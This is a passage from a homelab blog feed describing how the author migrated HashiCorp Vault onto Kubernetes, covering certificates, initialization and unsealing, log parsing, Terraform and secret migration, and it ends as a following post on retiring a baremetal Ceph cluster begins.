</span></span><span style="display:flex;"><span>        <span style="color:#f92672">serviceAccountRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault&#34;</span>
</span></span></code></pre></div><p>With this configuration, the Vault certs are collected (still from the old
baremetal Vault), with the Kubernetes authentication using the <code>vault</code> ServiceAccount.
This now works without issue, and a certificate usable by the k8s Vault instance
is generated.</p>
<p>I&rsquo;m also setting the renewal time of the Secret containing the certificate to
4000 hours. This should lead to automatic renewal with quite some time to spare,
as the certificates are given a lifetime of 4400h.</p>
<p>One thing to note is that the VaultDynamicSecret also needs the CA certificate.
The way I&rsquo;m currently supplying that one is a bit hacky. I&rsquo;m deploying Vault
with a Helm chart, and I&rsquo;ve added this to the <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">caBundle</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  {{- exec &#34;curl&#34; (list &#34;https://vault.example.com:8200/v1/my-ca/ca/pem&#34;) | nindent 2 }}</span>
</span></span></code></pre></div><p>This is a special functionality of the tool I&rsquo;ve been using to manage all of
the Helm charts in my cluster, <a href="https://github.com/helmfile/helmfile">Helmfile</a>.
It can interpret Go templates in the <code>values.yaml</code> file. That line fetches the
CA certificate from the Vault endpoint and stores it in the <code>caBundle</code> variable.
That is then used to create a Secret with the CA like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-ca-cert</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">stringData</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">caCert</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    {{- .Values.caBundle | nindent 6 }}</span>
</span></span></code></pre></div><h2 id="initializing-vault">Initializing Vault</h2>
<p>With all those Yaks safely shaven, I could finally go forward with initializing
the Kubernetes Vault cluster.</p>
<p>I used this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl exec -n vault vault-0 -- vault operator init -key-shares<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> -key-threshold<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> &gt; vault-init.txt
</span></span></code></pre></div><p>This initialization failed with a certificate error:</p>
<pre tabindex="0"><code>Get &#34;https://127.0.0.1:8200/v1/sys/seal-status&#34;: tls: failed to verify certificate: x509: cannot validate certificate for 127.0.0.1 because it doesn&#39;t contain any IP SANs
</code></pre><p>Even for local connections, Vault needs a cert. And that&rsquo;s why I&rsquo;ve got the
<code>127.0.0.1</code> IP SAN in the certificate used by Vault.</p>
<p>After I got that issue fixed, I finally successfully initialized the Vault
instance, resulting in this information:</p>
<pre tabindex="0"><code>Unseal Key 1: abcde123

Initial Root Token: hvs.foobar

Vault initialized with 1 key shares and a key threshold of 1. Please securely
distribute the key shares printed above. When the Vault is re-sealed,
restarted, or stopped, you must supply at least 1 of these keys to unseal it
before it can start servicing requests.

Vault does not store the generated root key. Without at least 1 keys to
reconstruct the root key, Vault will remain permanently sealed!

It is possible to generate new unseal keys, provided you have a quorum of
existing unseal keys shares. See &#34;vault operator rekey&#34; for more information.
</code></pre><p>In the initialization command, I told Vault that I only need one key share.
Normally, you would split the key into multiple shares so they can be distributed,
but that doesn&rsquo;t make any real sense for a small personal instance. If somebody
somehow gets one of the key shares, they would very likely be able to get the
others the same way.</p>
<p>It is very important to save the initial root token <code>hvs.foobar</code>. This is
needed for the initial configuration, until some policies and other auth
methods have been configured.</p>
<p>The next step was then to unseal all three Vault instances with these commands
and the unseal key output by the <code>vault init</code> command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl exec -it -n vault vault-0 -- vault operator unseal
</span></span><span style="display:flex;"><span>kubectl exec -it -n vault vault-1 -- vault operator unseal
</span></span><span style="display:flex;"><span>kubectl exec -it -n vault vault-2 -- vault operator unseal
</span></span></code></pre></div><p>One interesting thing to note: All of the Vault Pods, as configured by the
Helm chart, run with the OnDelete update strategy. This has the effect that no
change to the configuration, including e.g. setting new environment variables,
will do anything. The Pods always need to be deleted manually to make a change.</p>
<h2 id="configuring-vault-logging">Configuring Vault logging</h2>
<p>I like having my logs all in at least approximately the same format, and so
I&rsquo;ve got a log parsing section for most apps in my FluentD config. Normally I
don&rsquo;t mention this, but Vault is a little bit weird. Namely, it does output
its logs as JSON if so configured, which is good. It makes parsing a lot simpler.
But, it also adds an <code>@</code> symbol to the names of <em>most</em> of the JSON keys:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;@level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;@message&#34;</span>:<span style="color:#e6db74">&#34;compacting logs&#34;</span>,<span style="color:#f92672">&#34;@module&#34;</span>:<span style="color:#e6db74">&#34;storage.raft&#34;</span>,<span style="color:#f92672">&#34;@timestamp&#34;</span>:<span style="color:#e6db74">&#34;2025-04-06T18:11:31.197956Z&#34;</span>,<span style="color:#f92672">&#34;from&#34;</span>:<span style="color:#ae81ff">893122</span>,<span style="color:#f92672">&#34;to&#34;</span>:<span style="color:#ae81ff">901345</span>}
</span></span><span style="display:flex;"><span>{<span style="color:#f92672">&#34;@level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;@message&#34;</span>:<span style="color:#e6db74">&#34;snapshot complete up to&#34;</span>,<span style="color:#f92672">&#34;@module&#34;</span>:<span style="color:#e6db74">&#34;storage.raft&#34;</span>,<span style="color:#f92672">&#34;@timestamp&#34;</span>:<span style="color:#e6db74">&#34;2025-04-06T18:11:31.235460Z&#34;</span>,<span style="color:#f92672">&#34;index&#34;</span>:<span style="color:#ae81ff">911585</span>}
</span></span></code></pre></div><p>And I&rsquo;ve got no idea why. Or how it decides which keys get the <code>@</code> and which
do not. It made my log parsing a little bit more complicated. It now looks
like this:</p>
<pre tabindex="0"><code># Log config for the Vault deployment
&lt;filter services.vault.vault&gt;
  @type parser
  key_name log
  reserve_data true
  remove_key_name_field true
  &lt;parse&gt;
    @type multi_format
    &lt;pattern&gt;
      format json
      time_key &#34;@timestamp&#34;
      time_type string
      time_format %iso8601
      utc true
    &lt;/pattern&gt;
    &lt;pattern&gt;
      format regexp
      expression /^(?&lt;msg&gt;.*)$/
      time_key nil
    &lt;/pattern&gt;
  &lt;/parse&gt;
&lt;/filter&gt;

&lt;filter services.vault.vault&gt;
  @type record_modifier
  remove_keys _dummy_,@level
  &lt;record&gt;
    _dummy_ ${record[&#34;level&#34;] = record[&#34;@level&#34;] if record.key?(&#34;@level&#34;)}
  &lt;/record&gt;
&lt;/filter&gt;
</code></pre><p>The first filter does the main parsing, while the second one specifically
removes the <code>@</code> in front of the <code>level</code> entry in the log object, because
that&rsquo;s the key where my setup expects to see the log level.</p>
<p>Another weird thing, where Vault is by far not the biggest offender, are apps
which log in multiple different formats. That&rsquo;s why the first filter has a
<code>multi_format</code> parser. For reasons I&rsquo;m not sure about, Vault outputs some general
information in the beginning of the log, during startup, where it doesn&rsquo;t respect
the log format configuration:</p>
<pre tabindex="0"><code>==&gt; Vault server configuration:

Administrative Namespace:
             Api Address: https://10.8.1.61:8200
                     Cgo: disabled
         Cluster Address: https://vault-0.vault-internal:8201
   Environment Variables: HOME, HOSTNAME, HOST_IP, KUBERNETES_PORT, KUBERNETES_PORT_443_TCP, KUBERNETES_PORT_443_TCP_ADDR, KUBERNETES_PORT_443_TCP_PORT, KUBERNETES_PORT_443_TCP_PROTO, KUBERNETES_SERVICE_HOST, KUBERNETES_SERVICE_PORT, KUBERNETES_SERVICE_PORT_HTTPS, NAME, PATH, POD_IP, PWD, SHLVL, SKIP_CHOWN, SKIP_SETCAP, TERM, VAULT_ADDR, VAULT_API_ADDR, VAULT_CACERT, VAULT_CLUSTER_ADDR, VAULT_K8S_NAMESPACE, VAULT_K8S_POD_NAME, VAULT_LOG_FORMAT, VAULT_LOG_LEVEL, VAULT_PORT, VAULT_PORT_8200_TCP, VAULT_PORT_8200_TCP_ADDR, VAULT_PORT_8200_TCP_PORT, VAULT_PORT_8200_TCP_PROTO, VAULT_PORT_8201_TCP, VAULT_PORT_8201_TCP_ADDR, VAULT_PORT_8201_TCP_PORT, VAULT_PORT_8201_TCP_PROTO, VAULT_RAFT_NODE_ID, VAULT_SERVICE_HOST, VAULT_SERVICE_PORT, VAULT_SERVICE_PORT_HTTPS, VAULT_SERVICE_PORT_HTTPS_INTERNAL, VERSION
              Go Version: go1.23.6
              Listener 1: tcp (addr: &#34;[::]:8200&#34;, cluster address: &#34;[::]:8201&#34;, disable_request_limiter: &#34;false&#34;, max_request_duration: &#34;1m30s&#34;, max_request_size: &#34;33554432&#34;, tls: &#34;enabled&#34;)
               Log Level: debug
                   Mlock: supported: true, enabled: false
           Recovery Mode: false
                 Storage: raft (HA available)
                 Version: Vault v1.18.5, built 2025-02-24T09:40:28Z
             Version Sha: 2cb3755273dbd63f5b0f8ec50089b57ffd3fa330

==&gt; Vault server started! Log data will stream in below:
</code></pre><p>Why output that in plain text, instead of also putting it into JSON? It seems to
be a quirk of all of HashiCorp&rsquo;s tools, Nomad and Consul also do the same thing
if I remember correctly.</p>
<h2 id="migrating-to-the-new-vault-instance">Migrating to the new Vault instance</h2>
<p>With the instance on Kubernetes now configured, I need to migrate the data to
that instance. Sadly, there&rsquo;s not really a good way to migrate especially K/V
store entries from one Vault to another. So I just went with manual migration.</p>
<h3 id="running-terraform-against-the-new-instance">Running Terraform against the new instance</h3>
<p>As I&rsquo;ve mentioned before, I&rsquo;m using Terraform for a lot of the configuration for
Vault, because that is preferable to keeping a list of commands in my
docs.</p>
<p>But the issue was: I also needed to keep the configuration for the old Vault
instance, because I needed to keep that one running during the migration as well.</p>
<p>So I started out with just adding the second Vault as another provider to my
Terraform config, via <a href="https://developer.hashicorp.com/terraform/language/providers/configuration#alias-multiple-provider-configurations">provider aliases</a>.
It looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;vault&#34;</span> {
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://vault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;vault&#34;</span> {
</span></span><span style="display:flex;"><span>  alias <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;k8s&#34;</span>
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://newvault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This allows me to keep configurations for two Vault instances in the same Terraform
state. I initially only created the <code>userpass</code> auth method for the new Vault,
to verify that the Terraform setup worked:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_auth_backend&#34; &#34;userpass&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;userpass&#34;</span>
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;userpass&#34;</span>
</span></span><span style="display:flex;"><span>  local <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_auth_backend&#34; &#34;userpass-k8s&#34;</span> {
</span></span><span style="display:flex;"><span>  provider <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>.<span style="color:#66d9ef">k8s</span>
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;userpass&#34;</span>
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;userpass&#34;</span>
</span></span><span style="display:flex;"><span>  local <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>With the <code>provider</code> setting, I could choose which Vault provider config I wanted
to use.</p>
<p>But trying a <code>terraform apply</code> with this configuration resulted in an error:</p>
<pre tabindex="0"><code>│ Error: failed to lookup token, err=Error making API request.
│
│ URL: GET https://vault.example.com:8200/v1/auth/token/lookup-self
│ Code: 403. Errors:
│
│ * 2 errors occurred:
│       * permission denied
│       * invalid token
</code></pre><p>This confused me - until I remembered that I had configured the Vault root token
for the new k8s Vault in the terminal I was running the command. Running my
customary <code>vault login -method=userpass username=myuser</code> on another shell and
executing the <code>terraform apply</code> of course also didn&rsquo;t work, because now it had
only the Vault token needed for the old Vault instance.</p>
<p>A quick look into the <a href="https://registry.terraform.io/providers/hashicorp/vault/latest/docs#vault-authentication-configuration-options">Vault Terraform provider documentation</a>
lead to the solution. I could configure one provider <a href="https://registry.terraform.io/providers/hashicorp/vault/latest/docs#token-file">with a filepath</a>
to a token file. That would be the provider for the old Vault instance. Then
I would leave the provider for the new Vault unconfigured, which would mean that
it would continue to use the <code>VAULT_TOKEN</code> environment variable. The resulting
provider config looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;vault&#34;</span> {
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://vault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">auth_login_token_file</span> {
</span></span><span style="display:flex;"><span>    filename <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/home/myuser/.vault-token&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;vault&#34;</span> {
</span></span><span style="display:flex;"><span>  alias <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;k8s&#34;</span>
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://newvault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I would then first run the login for the old provider:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault login -method<span style="color:#f92672">=</span>userpass username<span style="color:#f92672">=</span>myuser
</span></span></code></pre></div><p>Then, in the same terminal, I would set the <code>VAULT_TOKEN</code> variable to the root
token of the new Vault:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>export VAULT_TOKEN<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;hvs.foobar&#34;</span>
</span></span></code></pre></div><p>And with that, I was able to run <code>terraform apply</code> without issue, and both
Vault instances were configurable.</p>
<p>Next, I needed to be able to stop using the root token for the new instance and
instead create a <code>userpass</code> login for that one as well. This, I needed to do on
the command line, because the <a href="https://registry.terraform.io/providers/hashicorp/vault/latest/docs/resources/generic_endpoint">Terraform resource</a>
that needs to be used to create a <code>userpass</code> user requires the password as part
of the Terraform resources, and I really did not want that. So I created it
on the command line:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault write auth/userpass/users/myuser password<span style="color:#f92672">=</span>- token_policies<span style="color:#f92672">=</span>admin token_ttl<span style="color:#f92672">=</span>4h token_max_ttl<span style="color:#f92672">=</span>4h token_bound_cidrs<span style="color:#f92672">=</span>300.300.300.12 token_type<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;default&#34;</span>
</span></span></code></pre></div><p>This will create the user <code>myuser</code> in the <code>userpass</code> backend and will ask for
the password on the command line. Tokens issued by this auth method for the user
will be valid for four hours and will only be valid when used from the <code>300.300.300.12</code>
source IP, which is my Command &amp; Control host.</p>
<p>Now, instead of exporting the root token in the <code>VAULT_TOKEN</code> variable, I could
issue this command to instead get a token for the <code>myuser</code> role:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>export VAULT_TOKEN<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>vault login -method<span style="color:#f92672">=</span>userpass -token-only username<span style="color:#f92672">=</span>myuser<span style="color:#66d9ef">)</span>
</span></span></code></pre></div><h2 id="migrating-kv-secrets">Migrating K/V secrets</h2>
<p>After I had the <code>userpass</code> login configured, I could just copy+paste all of the
Terraform resources for my Vault setup, add the <code>provider = vault.k8s</code> option,
and one <code>terraform apply</code> later, most configuration was migrated to the new
Vault instance on Kubernetes.</p>
<p>The only problem were the K/V secrets. Those are not in Terraform, because that
would have required me to put my secrets into the Terraform config files and the
Terraform state. After searching around a little, it looked like there was no
official way to run a migration of K/V secrets, so I came up with my own.</p>
<p>First, I would export the <code>data</code> field, which contains the actual secrets, as
opposed to some metadata, from the old Vault:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv get -field data -format json secret/topsecret/database-creds &gt; out.json
</span></span></code></pre></div><p>That would give me a JSON file like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;username&#34;</span>: <span style="color:#e6db74">&#34;foo&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;password&#34;</span>: <span style="color:#e6db74">&#34;bar&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>That could then be imported into the new Vault like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv put secret/topsecret/database-creds @out.json
</span></span></code></pre></div><p>I did that exactly 59 times, and all of my secrets were successfully migrated
over.</p>
<h2 id="update-playbook-changes">Update playbook changes</h2>
<p>Another interesting piece of code I would like to talk about is my Homelab host
update Ansible playbook. This playbook runs updates of the host OS, Ubuntu
server in my case, including automatic reboots and k8s node drains. But I would
need to manually unseal the Vault Pods once their host was updated and rebooted.
For that, I&rsquo;m just having an Ansible task outputting the command I can copy+paste
into another terminal to do the unseal.</p>
<p>This was pretty simple up to now, with the baremetal Vault, because I could
directly contact the host being updated, because the Vault instance on there
would be the one which needs the unseal.
But, with Vault in k8s, there&rsquo;s no obvious way to determine which of the three
Vault Pods ran on the host currently being updated. I needed an approach to
find the right container.</p>
<p>The first step is to wait for the local Vault Pod on the rebooted machine to
come up again, so that it would even accept the unseal command. I did that
with the following task:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for vault to be running</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candchost</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">candcuser</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubernetes.core.k8s_info</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Pod</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">label_selectors</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">app.kubernetes.io/name=vault</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">app.kubernetes.io/instance=vault</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">field_selectors</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;spec.nodeName={{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">wait</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">wait_condition</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">status</span>: <span style="color:#e6db74">&#34;True&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Ready&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">wait_sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">wait_timeout</span>: <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">vault_pod_list</span>
</span></span></code></pre></div><p>This task uses the <a href="https://docs.ansible.com/ansible/latest/collections/kubernetes/core/k8s_info_module.html#ansible-collections-kubernetes-core-k8s-info-module">Kubernetes Ansible collection</a>
to have Ansible wait for the Vault Pod to be in <code>Ready</code> state. I&rsquo;m also saving the list
of discovered Vault Pods in a variable for later use. This task would only wait
for the Vault Pod on the host currently being updated, via the field selector.</p>
<p>Short aside: This also taught me that I could do the following:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get pods -A --field-selector <span style="color:#e6db74">&#34;spec.nodeName=mynode&#34;</span>
</span></span></code></pre></div><p>Instead of <code>kubectl get pods -A -o wide | grep mynode</code>. After over a year of
running Kubernetes in my Homelab. &#x1f926;</p>
<p>But let&rsquo;s move on. I now had the name of the Vault Pod on the rebooted host
in the <code>vault_pod_list</code> variable, which allowed me to output a command line
I could copy+paste to unseal the Vault instance:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unseal vault prompt</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">echo</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prompt</span>: <span style="color:#e6db74">&#34;Please unseal vault: kubectl exec -it -n vault {{ vault_pod_list.resources[0].metadata.name }} -- vault operator unseal&#34;</span>
</span></span></code></pre></div><p>This is a pretty convenient way to integrate manual operations into an Ansible
play and works quite well. I see this prompt, copy the line and unseal the Pod,
and then I just hit <code>&lt;Return&gt;</code> in the shell where Ansible is running and the
play will continue.</p>
<h2 id="switching-the-certs-over-to-the-new-vaults-ca">Switching the certs over to the new Vault&rsquo;s CA</h2>
<p>If you remember from further up (and I won&rsquo;t be mad if you don&rsquo;t, looking at the
length of this post&hellip;), I was using the baremetal Vault instance to generate the
certificates for the new Vault instance. But this also meant that those certs
were relying on the old Vault&rsquo;s CA.</p>
<p>The first step was to update the CA cert in the k8s Secret used for the
VaultDynamicSecret for the Vault certificate, which I did by changing the
line in my <code>values.yaml</code> file fetching the CA:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>{{- <span style="color:#ae81ff">exec &#34;curl&#34; (list &#34;-k&#34; &#34;https://newvault:8200/v1/my-ca/ca/pem&#34;) | nindent 2 }}</span>
</span></span></code></pre></div><p>This did not have any direct effect on anything. The certificate Secret has a
TTL of 4000 hours, so won&rsquo;t try to recreate the certs anytime soon. At the same
time, Vault won&rsquo;t automatically reload a new CA either, so everything was fine.</p>
<p>Then I went into the VaultDynamicSecret and updated the Vault URL from the old
to the new Vault. This regenerated the Vault certificates. But again, Vault
itself doesn&rsquo;t react to that, so Vault was still up and running without issue.</p>
<p>Then I send <code>SIGHUP</code> to each Vault instance in turn, which triggered a configuration
reload, including fresh certificates.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl exec -it -n vault vault-0 -- sh
</span></span><span style="display:flex;"><span>kill -SIGHUP <span style="color:#66d9ef">$(</span>pidof vault<span style="color:#66d9ef">)</span>
</span></span></code></pre></div><p>And that&rsquo;s it. I added annotations to a couple of ExternalSecrets to trigger
refreshes to make sure it all worked, and it did, external-secrets successfully
got the secrets from the new Vault k8s instance.</p>
<p>This was quite a lot more work than I thought, but it was also the second-to-last
part of the migration.
Now, the only thing still missing is to migrate the control plane off of the
VMs on my extension host and onto the three Raspberry Pi 4 which previously served as
controller nodes and are now empty, thanks to the baremetal Vault having been shut down.</p>
<p>But it&rsquo;s Monday evening now, and the controller migration is more a weekend task,
because it also includes moving the MONs of the Rook Ceph cluster, and that
will need some full cluster restarts.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 23: Shutdown of the Baremetal Ceph Cluster</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-23-baremetal-ceph-shutdown/</link>
      <pubDate>Sat, 29 Mar 2025 15:10:33 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-23-baremetal-ceph-shutdown/</guid>
      <description>Migration of the last remaining data and shutdown of my baremetal Ceph cluster</description>
      <content:encoded><![CDATA[<p>Wherein I migrate the last remaining data off of my baremetal Ceph cluster and
shut it down.</p>
<p>This is part 24 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>I set up my baremetal Ceph cluster back in March of 2021, driven by how much
I liked the idea of large pools of disk I could use to provide S3 storage, Block
devices and a POSIX compatible filesystem. Since then, it has served me rather
well, and I&rsquo;ve been using it to provide S3 buckets and volumes for my Nomad
cluster. Given how happy I was with it, I also wanted to continue using it for
my Kubernetes cluster.</p>
<p>To this end, I was quite happy to discover the <a href="https://rook.io/">Rook Ceph</a>
project, which at its core implements a Kubernetes operator capable of
orchestrating an entire Ceph cluster. I&rsquo;ve described my setup in far more
detail in <a href="https://blog.mei-home.net/posts/k8s-migration-4-ceph-rook/">this blog post</a>.</p>
<p>In the original baremetal cluster, I had three nodes, each with one HDD and one
SSD for storage, running all Ceph daemons besides the MONs, which ran on my
cluster controller Pi 4. I&rsquo;ve run the cluster with replicated pools and a
replication of two, as well as a minimal size of one, so I could reboot a node
without all writes to the cluster having to stop e.g. during maintenance.
I was lucky in that all of my data also comfortably fit on only two hosts
with a 1 TB SSD and a 4 TB HDD. So when the time to start the migration came,
I took my emergency replacement HDD and SSD and put them into my old Homeserver.
A VM running on that server became the first OSD node in the k8s cluster. I also
drained the OSDs and other daemons from one of the original baremetal nodes and
moved that into the k8s cluster as well. So I still ended up with 2x replication,
just with two clusters of two storage nodes each.</p>
<p>After I was finally done migrating all of my services from Nomad to Kubernetes,
I still had the following datasets on the baremetal Ceph cluster:</p>
<ol>
<li>An NFS Ganesha cluster serving the boot partitions of all of my netbooting hosts</li>
<li>A data dump CephFS volume that contained just some random data, like old slides and
digital notes from my University days</li>
